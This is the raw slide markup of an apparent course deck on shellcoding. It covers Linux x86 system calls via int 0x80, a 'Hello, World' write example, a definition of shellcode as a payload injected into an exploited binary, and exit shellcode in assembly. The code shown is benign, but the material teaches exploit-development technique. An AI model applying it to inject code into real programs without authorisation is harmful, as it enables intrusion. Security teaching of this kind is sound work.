              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="708025" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="707390" algn="l"/>
                <a:tab pos="708660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Syscalls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be made in x86 using interrupt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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0x80</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1622425">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x80</a:t>
            </a:r>
            <a:endParaRPr sz="3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708025" indent="-419100">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="707390" algn="l"/>
                <a:tab pos="708660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Look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at all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pretty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syscalls</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1164590" marR="901700" lvl="1" indent="-418465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1164590" algn="l"/>
                <a:tab pos="1165860" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" sz="3000" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="00AFEF"/>
                  </a:solidFill>
                </a:uFill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http://syscalls.kernelgrok.com/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0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</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill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835C43B-F55B-4397-B082-A03DA323A127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202803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5265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Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>(Revisited)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27225" y="2115021"/>
            <a:ext cx="806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message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7215" y="2610320"/>
            <a:ext cx="918844" cy="1507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eax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eax  ebx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ebx  edx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edx  al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4</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="339090" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pP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bl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1 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ecx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7196" y="4096217"/>
            <a:ext cx="69532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dl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13  0x80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al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7196" y="4839165"/>
            <a:ext cx="918844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ebx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ebx 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0x80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110" y="1867371"/>
            <a:ext cx="1586230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user_code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12700" marR="337820" indent="893444">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp  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write_str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906144" marR="337820" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xor  xor  xor  mov  mov  pop  mov  int  mov  xor  int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message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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90487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.ascii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27196" y="5582114"/>
            <a:ext cx="180975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41275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write_str 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"Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-9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World\n"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8540" y="3195180"/>
            <a:ext cx="35115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100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Syscall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4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(Write)  Output FD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sz="2000" spc="-7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(STDOUT)</a:t>
            </a:r>
            <a:endParaRPr sz="20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Buffer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“Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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World\n” 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Bytes to write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13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28934" y="3380686"/>
            <a:ext cx="1073150" cy="87630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1073150" h="87629">
                <a:moveTo>
                  <a:pt x="1072872" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="87326"/>
                </a:lnTo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33244" y="3427126"/>
            <a:ext cx="107767" cy="81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3939" y="3684260"/>
            <a:ext cx="1141730" cy="62865"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1141729" h="62864">
                <a:moveTo>
                  <a:pt x="1141667" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62729"/>
                </a:lnTo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78094" y="3706045"/>
            <a:ext cx="107096" cy="81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25595" y="3960233"/>
            <a:ext cx="1410970" cy="64135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1410970" h="64135">
                <a:moveTo>
                  <a:pt x="1410711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="63832"/>
                </a:lnTo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29708" y="3983108"/>
            <a:ext cx="106834" cy="81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60284" y="4252492"/>
            <a:ext cx="1155700" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1155700" h="25400">
                <a:moveTo>
                  <a:pt x="1155322" y="25115"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo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64329" y="4211509"/>
            <a:ext cx="106163" cy="819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CDEB617C-B127-48FC-A380-9CFCFD4A387C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90094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42341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Defining</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode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6198" y="2268830"/>
            <a:ext cx="7527290" cy="269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100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F3F3F3"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman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FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="3000" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="928369" marR="24765" lvl="1" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="928369" algn="l"/>
                <a:tab pos="92900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set of instructions that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injected by the user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executed by the exploited</a:t>
            </a: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2D050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="928369" lvl="1" indent="-413384">
              <a:lnSpc>
                <a:spcPts val="2745"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="928369" algn="l"/>
                <a:tab pos="929005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Generally the ‘payload’ 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F0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr sz="2400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928369" marR="5080" lvl="1" indent="-412750">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="928369" algn="l"/>
                <a:tab pos="929005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shellcode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you can essentially make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program  execute code that never existed in the original</a:t>
            </a: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2D050"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="928369" lvl="1" indent="-413384">
              <a:lnSpc>
                <a:spcPts val="2760"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="●"/>
              <a:tabLst>
                <a:tab pos="928369" algn="l"/>
                <a:tab pos="929005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You’re basically injecting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A906EA7F-966E-4D6C-B631-9EFDE128EB6B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68023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5265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Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>World</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>(Revisited)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27225" y="2115021"/>
            <a:ext cx="806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message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7215" y="2610320"/>
            <a:ext cx="918844" cy="1507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eax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eax  ebx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ebx  edx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edx  al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4</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="339090" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pP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bl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1 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ecx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7196" y="4096217"/>
            <a:ext cx="69532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dl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13  0x80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al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7196" y="4839165"/>
            <a:ext cx="918844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ebx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ebx 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0x80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110" y="1867371"/>
            <a:ext cx="1586230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user_code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12700" marR="337820" indent="893444">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp  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write_str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906144" marR="337820" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xor  xor  xor  mov  mov  pop  mov  int  mov  xor  int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message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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90487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.ascii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27196" y="5582114"/>
            <a:ext cx="180975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41275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write_str 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"Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-9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World\n"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8540" y="3195180"/>
            <a:ext cx="35115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100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Syscall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4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(Write)  Output FD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sz="2000" spc="-7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(STDOUT)</a:t>
            </a:r>
            <a:endParaRPr sz="20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Buffer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“Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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World\n” 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Bytes to write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13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28934" y="3380686"/>
            <a:ext cx="1073150" cy="87630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1073150" h="87629">
                <a:moveTo>
                  <a:pt x="1072872" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="87326"/>
                </a:lnTo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33244" y="3427126"/>
            <a:ext cx="107767" cy="81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3939" y="3684260"/>
            <a:ext cx="1141730" cy="62865"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1141729" h="62864">
                <a:moveTo>
                  <a:pt x="1141667" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="62729"/>
                </a:lnTo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78094" y="3706045"/>
            <a:ext cx="107096" cy="81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25595" y="3960233"/>
            <a:ext cx="1410970" cy="64135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1410970" h="64135">
                <a:moveTo>
                  <a:pt x="1410711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="63832"/>
                </a:lnTo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29708" y="3983108"/>
            <a:ext cx="106834" cy="81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60284" y="4252492"/>
            <a:ext cx="1155700" cy="25400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1155700" h="25400">
                <a:moveTo>
                  <a:pt x="1155322" y="25115"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="190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64329" y="4211509"/>
            <a:ext cx="106163" cy="819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75541" y="4689565"/>
            <a:ext cx="47713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Basically:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="43053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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>write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“Hello, World\n”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20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13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D245F74E-651A-4259-A423-2D061B32C9CA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081814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3793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Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5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0223" y="1730456"/>
            <a:ext cx="8217534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Linux Syscalls sorta use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fastcall</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-34544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specific syscall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#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is loaded into</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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FFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-34544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arguments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call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placed in different</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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registers</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-345440">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buChar char="-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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>int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0x80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executes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call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syscall()</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-34544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CPU switches to kernel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mode</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-34544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each syscall has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unique, static</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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9FC8469-19AA-40E9-BCA7-93E07232873D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216250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8ECE6ACC-D188-4C2E-85B3-3CDB8E89CEC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632186" y="4191533"/>
            <a:ext cx="3886200" cy="304267"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27905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6925" y="2095035"/>
            <a:ext cx="4994275" cy="361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 indent="-518159">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pP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Defining</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-1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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-2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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Linux System</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" strike="sngStrike" spc="-15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Calls</a:t>
            </a:r>
            <a:endParaRPr sz="2000" strike="sngStrike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Writing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&amp;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Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="20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Shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Shellcode in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Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="2000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Additional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Notes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3EDAC9D-0682-4D2B-BC16-70A1BCA0CB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6676" y="488791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Shellcoding</a:t>
            </a:r>
            <a:endParaRPr sz="4800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F3001688-89D9-4DA1-ABC7-744A03AB2824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63176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40239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Writing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-90" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Shellcode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9173" y="2776252"/>
            <a:ext cx="4168775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315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Writing	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exit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sz="2400" spc="-85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srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode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926465" indent="-460375">
              <a:lnSpc>
                <a:spcPts val="2865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sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>EBX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926465" indent="-460375">
              <a:lnSpc>
                <a:spcPts val="285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sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>EAX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926465" indent="-460375">
              <a:lnSpc>
                <a:spcPts val="2865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Call </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F79546"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int </a:t>
            </a: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0x80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94249" y="1179136"/>
            <a:ext cx="3942411" cy="4296015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4017645" h="3601720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4017283" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4017283" y="3601485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="360148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47919" y="1447800"/>
            <a:ext cx="3352165" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3352165" h="357505">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3351602" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3351602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7919" y="1846935"/>
            <a:ext cx="1173480" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1173479" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1173058" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173058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3325" y="2220398"/>
            <a:ext cx="1005840" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1005839" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1005485" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005485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75490" y="2924612"/>
            <a:ext cx="1005840" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1005839" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1005485" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005485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53759" y="2924611"/>
            <a:ext cx="167640" cy="357505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="167639" h="357504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167582" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167582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28234" y="1382849"/>
            <a:ext cx="3371850" cy="18389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  <a:tabLst>
                <a:tab pos="1383665" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-105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00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exit_shellcode.asm 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Section .text  global	_start</a:t>
            </a:r>
            <a:endParaRPr sz="2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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>_start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2400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consola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39032"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5715000" y="3366036"/>
          <a:ext cx="3086100" cy="1445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3898">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2265"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1005205" algn="l"/>
                          <a:tab pos="1842770" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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xo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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r	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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eb</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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ebx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ts val="2865"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1005205" algn="l"/>
                          <a:tab pos="1842770" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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xo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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r	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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ea</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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eax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49">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2280"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1005205" algn="l"/>
                          <a:tab pos="1675130" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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mo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400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v	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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400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l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	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20">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2280"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab pos="1005205" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="24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2400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t	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0x80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720534" y="3886984"/>
            <a:ext cx="807085" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="807085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="806552" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="76199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41394" y="3801291"/>
            <a:ext cx="235585" cy="171450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="235585" h="171450">
                <a:moveTo>
                  <a:pt x="0" y="171386"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="85692" y="85693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235439" y="85693"/>
                </a:lnTo>
